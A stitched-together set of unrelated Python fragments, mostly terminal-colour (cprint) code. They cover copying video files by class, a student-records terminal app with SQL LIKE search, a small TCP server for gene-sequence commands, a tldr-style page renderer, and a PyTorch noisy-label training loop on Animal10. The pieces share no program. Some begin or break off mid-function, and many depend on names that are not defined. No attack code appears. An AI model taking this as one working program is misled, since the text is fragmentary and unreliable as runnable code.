                outfile = dest_dir / row.tag / "{:06d}.mp4".format(row.id)
                shutil.copy(str(infile), str(outfile))
                copied += 1
            # Otherwise, show an error and skip
            else:
                print("", end="\r")
                cprint(
                    "Failed to copy ({:06d}, {}, {}): Unknown class '{}'"
                    .format(row.id, row.tag, row.notes, row.tag), 'red', flush=True)
                log_file.write(
                    "Skipped copying file {} with entry ({:06d}, {}, {}). "
                    "Reason: Unknown class {}.\n"
                    .format(infile, row.id, row.tag, row.notes, row.tag))
                skipped += 1
            count += 1
            sys.stdout.flush()

    print("\rDone. Copied {} files with {} classes. "
          "({} skipped, see log file for details) "
          .format(copied, len(classes), skipped))
    log_file.close()
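# count_entries is used above to size the progress bar but is not defined in
# this excerpt; a plausible minimal version (the name and behaviour are
# inferred from its use with the pandas CSV files):
import pandas as pd

def count_entries(csv_paths):
    # Total number of classification rows across all _classes.csv files.
    return sum(len(pd.read_csv(p)) for p in csv_paths)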
# Entry point for the student-records program. welcome_scr, main_menu,
# database, add_cursor, cursor_indx and col are defined elsewhere in the file.
if __name__ == '__main__':
    welcome_scr()
    getch.getch()
    data_base = database()
    lst = main_menu()
    add_cursor(lst, cursor_indx)
    x = colored('||', 'yellow', attrs=['bold'])
    cprint('=' * col, 'yellow', attrs=['bold'])
    for i in lst:
        # i[5:-4] strips the ANSI colour codes around each menu entry
        # so the right-hand border lines up
        print(x, i, ' ' * (col - len(i[5:-4]) - 4), x)
    cprint('=' * col, 'yellow', attrs=['bold'])
    while True:
        inp = getch.getch()
        if inp == '\n':
            if cursor_indx == 0:
                data = add_scr()
                if data is not None:
                    data_base.insert_new(data)
                    cprint('Added new record successfully !', 'cyan',
                           attrs=['bold'])
                else:
                    os.system('clear')
def search_scr():
    global start
    global end
    global list_cursor_indx
    start = 0
    list_cursor_indx = 0
    os.system('clear')
    cprint("Leave a field empty if you don't want it as a search key",
           'yellow', attrs=['bold'])
    cprint('ID : ', 'green', attrs=['bold'])
    ID = input() + '%'
    cprint('First name : ', 'green', attrs=['bold'])
    fname = input() + '%'
    cprint('Last name : ', 'green', attrs=['bold'])
    lname = input() + '%'
    cprint('Class : ', 'green', attrs=['bold'])
    clas = input() + '%'
    cprint('Section : ', 'green', attrs=['bold'])
    sec = input() + '%'
    cprint('Phone : ', 'green', attrs=['bold'])
    phn = input() + '%'
    search_key = (ID, fname, lname, clas, sec, phn)
    tmp_lst = data_base.search(search_key)
    # Colour each field of every matching record
    for i, j in enumerate(tmp_lst):
        a, b, c, d, e, f, g, h = j
        a = colored(a, 'red', attrs=['bold'])
        b = colored(b, 'green', attrs=['bold'])
        c = colored(c, 'green', attrs=['bold'])
        d = colored(d, 'magenta', attrs=['bold'])
        e = colored(e, 'blue', attrs=['bold'])
        f = colored(f, 'yellow', attrs=['bold'])
        g = colored(g, 'white', attrs=['bold'])
        h = colored(h, 'cyan', attrs=['bold'])
        tmp_lst[i] = (a, b, c, d, e, f, g, h)
    list_cursor_indx = len(tmp_lst) - 1
    add_list_cursor(tmp_lst, list_cursor_indx)
    manage_list_view(tmp_lst, 1)  # wraps the cursor back to the first record
    while True:
        inp = getch.getch()
        if inp == '+':
            manage_list_view(tmp_lst, 1)
        elif inp == '-':
            manage_list_view(tmp_lst, 0)
        elif inp == '\x7f':  # backspace: leave the search screen
            break
        elif inp == '\n':  # enter: show the selected record in detail
            remove_list_cursor(tmp_lst, list_cursor_indx)
            ID, fname, lname, clas, sec, dob, adrs, phn = tmp_lst[list_cursor_indx]
            os.system('clear')
            cprint('ID : ', 'yellow', end='', attrs=['bold'])
            cprint(ID, 'cyan', attrs=['bold'])
            cprint('Name : ', 'yellow', end='', attrs=['bold'])
            cprint(fname + ' ' + lname, 'cyan', attrs=['bold'])
            cprint('Class : ', 'yellow', end='', attrs=['bold'])
            cprint(str(clas) + ', ' + sec, 'cyan', attrs=['bold'])
            cprint('Date of birth : ', 'yellow', end='', attrs=['bold'])
            cprint(dob, 'cyan', attrs=['bold'])
            cprint('Address : ', 'yellow', end='', attrs=['bold'])
            cprint(adrs, 'cyan', attrs=['bold'])
            cprint('Phone : ', 'yellow', end='', attrs=['bold'])
            cprint(phn, 'cyan', attrs=['bold'])
            cprint('Press any key to continue...', 'blue', attrs=['bold'])
            getch.getch()
            add_list_cursor(tmp_lst, list_cursor_indx)
            break
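# The trailing '%' added to each field above is a SQL LIKE wildcard, so
# data_base.search presumably runs a query of roughly this shape (the table
# and column names here are assumptions; the real database class is not shown):
import sqlite3

def search_records(conn, key):
    # Hypothetical equivalent of data_base.search(key).
    ID, fname, lname, clas, sec, phn = key
    cur = conn.execute(
        "SELECT * FROM students "
        "WHERE id LIKE ? AND fname LIKE ? AND lname LIKE ? "
        "AND class LIKE ? AND section LIKE ? AND phone LIKE ?",
        (ID, fname, lname, clas, sec, phn))
    return cur.fetchall()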
# Assumes module-level setup elsewhere: listensock (a bound, listening
# socket), IP, PORT, Open, genelist, termcolor, and the Seq class with
# seq_count() and len() methods.
def listen():
    print(f"Waiting for connections (IP,PORT:{IP,PORT})")
    (cs, client_ip_port) = listensock.accept()
    print("A client has connected to the server!")
    msg_raw = cs.recv(2048)
    msg = msg_raw.decode()
    return [msg, cs]

# Server runs in a loop until the CLOSE command is sent
while Open:
    m = listen()
    if "PING" in m[0]:
        termcolor.cprint("PING command!", 'green')
        print("OK!")
        r = "OK!\n"
        m[1].send(r.encode())
    elif "GET" in m[0]:
        termcolor.cprint("GET requested", "green")
        num = int(m[0][-1])  # the requested index is the command's last character
        r = genelist[num]
        print(r)
        m[1].send(r.encode())
    elif "INFO " in m[0]:
        termcolor.cprint("INFO requested", "green")
        seq = Seq(m[0][5:])
        r = f"SEQUENCE:{seq} Length:{seq.len()}\n"
        for element in seq.seq_count():
            percent = seq.seq_count()[element] / seq.len() * 100
            # The original excerpt is cut off here; presumably each base's
            # percentage is appended to the reply before sending:
            r += f"{element}: {percent:.1f}%\n"
        m[1].send(r.encode())
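# A minimal client for the protocol handled above, useful for testing the
# server by hand (the host and port values are placeholders):
import socket

def send_command(host, port, command):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))
        s.send(command.encode())
        return s.recv(2048).decode()

# Example: print(send_command('127.0.0.1', 8080, 'PING'))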
# Prompts for a new student record; data_base is the module-level database handle.
def add_scr():
    os.system('clear')
    cprint('First name : ', 'yellow', end='', attrs=['bold'])
    fname = input()
    cprint('Last name : ', 'yellow', end='', attrs=['bold'])
    lname = input()
    cprint('Date of birth : ', 'yellow', end='', attrs=['bold'])
    dob = input()
    cprint('Class : ', 'yellow', end='', attrs=['bold'])
    try:
        clas = input()
        if len(clas) != 0:
            clas = int(clas)
    except ValueError:
        cprint('Entered invalid input !', 'red', attrs=['bold'])
        cprint('Press any key to continue...\nPress c to cancel...',
               'blue', attrs=['bold'])
        if getch.getch() == 'c':
            return None
        return add_scr()
    cprint('Section : ', 'yellow', end='', attrs=['bold'])
    sec = input()
    cprint('Address : ', 'yellow', end='', attrs=['bold'])
    adrs = input()
    cprint('Phone : ', 'yellow', end='', attrs=['bold'])
    try:
        phn = input()
        if len(phn) != 0:
            phn = int(phn)
    except ValueError:
        cprint('Entered invalid input !', 'red', attrs=['bold'])
        cprint('Press any key to continue...\nPress c to cancel...',
               'blue', attrs=['bold'])
        if getch.getch() == 'c':
            return None
        return add_scr()
    os.system('clear')
    cprint('Name : ', 'yellow', end='', attrs=['bold'])
    cprint(fname + ' ' + lname, 'cyan', attrs=['bold'])
    cprint('Class : ', 'yellow', end='', attrs=['bold'])
    cprint(str(clas) + ', ' + sec, 'cyan', attrs=['bold'])
    cprint('Date of birth : ', 'yellow', end='', attrs=['bold'])
    cprint(dob, 'cyan', attrs=['bold'])
    cprint('Address : ', 'yellow', end='', attrs=['bold'])
    cprint(adrs, 'cyan', attrs=['bold'])
    cprint('Phone : ', 'yellow', end='', attrs=['bold'])
    cprint(phn, 'cyan', attrs=['bold'])
    # Warn about possible duplicates before saving
    tmp_lst = data_base.search(('%', fname, lname, clas, sec, phn))
    if len(tmp_lst) != 0:
        cprint('\nWarning! There are {} records the same as this one.\n'
               'Make sure these are not the same student...\n'
               .format(len(tmp_lst)), 'red', attrs=['bold'])
        for i in tmp_lst:
            a, b, c, d, e, f, g, h = i
            a = colored(a, 'red', attrs=['bold'])
            b = colored(b, 'green', attrs=['bold'])
            c = colored(c, 'green', attrs=['bold'])
            d = colored(d, 'magenta', attrs=['bold'])
            e = colored(e, 'blue', attrs=['bold'])
            f = colored(f, 'yellow', attrs=['bold'])
            g = colored(g, 'white', attrs=['bold'])
            h = colored(h, 'cyan', attrs=['bold'])
            print(a, b, c, d, e, f, g, h)
    cprint('\n\nDo you really want to save this record? (y/n)',
           'magenta', attrs=['bold'])
    inp = input()
    if inp == 'y':
        return (None, fname, lname, clas, sec, dob, adrs, phn)
    return None
# Assumes module-level: colored/cprint (termcolor), columns (terminal width),
# LEADING_SPACES_NUM, command_splitter and param_regex (compiled regexes), and
# a colors_of() helper returning cprint's (color, on_color, attrs) arguments.
def output(page):
    # Need a better fancy method?
    if page is not None:
        for line in page:
            line = line.rstrip().decode('utf-8')
            if len(line) < 1:
                cprint(line.ljust(columns), *colors_of('blank'))
            elif line[0] == '#':
                cprint(line.ljust(columns), *colors_of('name'))
            elif line[0] == '>':
                line = ' ' + line[1:]
                cprint(line.ljust(columns), *colors_of('description'))
            elif line[0] == '-':
                cprint(line.ljust(columns), *colors_of('example'))
            elif line[0] == '`':
                line = line[1:-1]  # need to actually parse `` elements
                elements = [
                    colored(' ' * LEADING_SPACES_NUM, *colors_of('blank')),
                ]
                replaced_spaces = 0
                for item in command_splitter.split(line):
                    item, replaced = param_regex.subn(
                        lambda x: colored(x.group('param'),
                                          *colors_of('parameter')),
                        item)
                    if not replaced:
                        item = colored(item, *colors_of('command'))
                    else:
                        # Account for the '{{' and '}}' stripped from the
                        # template placeholder when padding the line
                        replaced_spaces += 4
                    elements.append(item)
                # Manually pad the rest of the line with coloured blanks
                elements.append(colored(
                    ' ' * (columns - len(line) - LEADING_SPACES_NUM + replaced_spaces),
                    *colors_of('blank')))
                print(''.join(elements))
            else:
                cprint(line.ljust(columns), *colors_of('description'))
        # Need a cleaner way to pad three coloured lines
        for _ in range(3):
            cprint(''.ljust(columns), *colors_of('blank'))
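# colors_of is called as cprint(line, *colors_of('name')), so it must return
# termcolor's positional arguments (color, on_color, attrs). A sketch of a
# plausible palette (the actual colours are assumptions):
def colors_of(key):
    palette = {
        'blank':       (None, 'on_blue', []),
        'name':        ('white', 'on_blue', ['bold']),
        'description': ('white', 'on_blue', []),
        'example':     ('green', 'on_blue', []),
        'command':     ('white', 'on_blue', []),
        'parameter':   ('cyan', 'on_blue', []),
    }
    return palette[key]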
# Assumes the surrounding training script provides: args, Animal10, vgg19_bn,
# lrt_correction, check_folder, _init_fn, plus the usual imports (torch,
# torch.nn as nn, torch.optim as optim, torch.optim.lr_scheduler as
# lr_scheduler, torch.nn.functional as F, torchvision.transforms as transforms,
# numpy as np, random, time, os, logging, termcolor.cprint).
def main(arg_seed, arg_timestamp):
    random_seed = arg_seed
    np.random.seed(random_seed)
    random.seed(random_seed)
    torch.manual_seed(random_seed)
    torch.cuda.manual_seed(random_seed)
    torch.cuda.manual_seed_all(random_seed)
    torch.backends.cudnn.deterministic = True  # needed for full determinism
    print('Random Seed {}\n'.format(arg_seed))

    # -- training parameters
    num_epoch = args.epoch
    milestone = [50, 75]
    batch_size = args.batch
    num_workers = 2
    weight_decay = 1e-3
    gamma = 0.2
    current_delta = args.delta
    lr = args.lr
    start_epoch = 0

    # -- specify dataset
    # data augmentation
    transform_train = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    transform_test = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])

    trainset = Animal10(split='train', transform=transform_train)
    trainloader = torch.utils.data.DataLoader(trainset,
                                              batch_size=batch_size,
                                              shuffle=True,
                                              num_workers=num_workers,
                                              worker_init_fn=_init_fn,
                                              drop_last=True)
    testset = Animal10(split='test', transform=transform_test)
    testloader = torch.utils.data.DataLoader(testset,
                                             batch_size=batch_size * 4,
                                             shuffle=False,
                                             num_workers=num_workers)
    num_class = 10

    print('train data size:', len(trainset))
    print('test data size:', len(testset))

    # -- create log file
    if arg_timestamp:
        time_stamp = time.strftime("%Y%m%d-%H%M%S")
        file_name = 'Ours(' + time_stamp + ').txt'
    else:
        file_name = 'Ours.txt'
    log_dir = check_folder('logs')
    file_name = os.path.join(log_dir, file_name)
    saver = open(file_name, "w")
    saver.write(repr(args) + "\n\n")
    saver.flush()

    # -- set network, optimizer, scheduler, etc
    net = vgg19_bn(num_classes=num_class, pretrained=False)
    net = nn.DataParallel(net)
    optimizer = optim.SGD(net.parameters(), lr=lr, weight_decay=weight_decay)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    net = net.to(device)
    exp_lr_scheduler = lr_scheduler.MultiStepLR(optimizer,
                                                milestones=milestone,
                                                gamma=gamma)
    criterion = torch.nn.CrossEntropyLoss()

    # -- misc
    iterations = 0
    f_record = torch.zeros([args.rollWindow, len(trainset), num_class])

    for epoch in range(start_epoch, num_epoch):
        train_correct = 0
        train_loss = 0
        train_total = 0

        net.train()
        for images, labels, indices in trainloader:
            if images.size(0) == 1:
                # skip single-sample batches: batch normalization needs more
                continue
            images, labels = images.to(device), labels.to(device)

            outputs = net(images)
            loss = criterion(outputs, labels)

            optimizer.zero_grad()
            loss.backward()
            optimizer.step()

            train_loss += loss.item()
            train_total += images.size(0)
            _, predicted = outputs.max(1)
            train_correct += predicted.eq(labels).sum().item()

            # record softmax outputs over a rolling window of epochs
            f_record[epoch % args.rollWindow, indices] = F.softmax(
                outputs.detach().cpu(), dim=1)

            iterations += 1
            if iterations % 100 == 0:
                cur_train_acc = train_correct / train_total * 100.
                cur_train_loss = train_loss / train_total
                cprint('epoch: {}\titerations: {}\tcurrent train accuracy: {:.4f}\ttrain loss:{:.4f}'
                       .format(epoch, iterations, cur_train_acc, cur_train_loss), 'yellow')
                if iterations % 5000 == 0:
                    saver.write('epoch: {}\titerations: {}\ttrain accuracy: {}\ttrain loss: {}\n'
                                .format(epoch, iterations, cur_train_acc, cur_train_loss))
                    saver.flush()

        train_acc = train_correct / train_total * 100.
        cprint('epoch: {}'.format(epoch), 'yellow')
        cprint('train accuracy: {:.4f}\ntrain loss: {:.4f}'.format(train_acc, train_loss), 'yellow')
        saver.write('epoch: {}\ntrain accuracy: {}\ntrain loss: {}\n'.format(epoch, train_acc, train_loss))
        saver.flush()

        exp_lr_scheduler.step()

        if epoch >= args.warm_up:
            # correct noisy labels from the averaged rolling predictions
            f_x = f_record.mean(0)
            y_tilde = trainset.targets
            y_corrected, current_delta = lrt_correction(
                y_tilde, f_x, current_delta=current_delta, delta_increment=0.1)
            logging.info('Current delta:\t{}\n'.format(current_delta))
            trainset.update_corrupted_label(y_corrected)

        # testing
        net.eval()
        test_total = 0
        test_correct = 0
        with torch.no_grad():
            for images, labels, _ in testloader:
                images, labels = images.to(device), labels.to(device)
                outputs = net(images)

                test_total += images.size(0)
                _, predicted = outputs.max(1)
                test_correct += predicted.eq(labels).sum().item()

        test_acc = test_correct / test_total * 100.
        cprint('>> current test accuracy: {:.4f}'.format(test_acc), 'cyan')
        saver.write('>> current test accuracy: {}\n'.format(test_acc))
        saver.flush()

    saver.close()
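# _init_fn (passed as worker_init_fn above) is not shown in this excerpt. For
# reproducible data loading it is typically a small seeding hook like the one
# below, assuming a module-level random_seed; this is a common pattern, not
# necessarily the original code:
def _init_fn(worker_id):
    # Seed NumPy differently but deterministically in each DataLoader worker.
    np.random.seed(random_seed + worker_id)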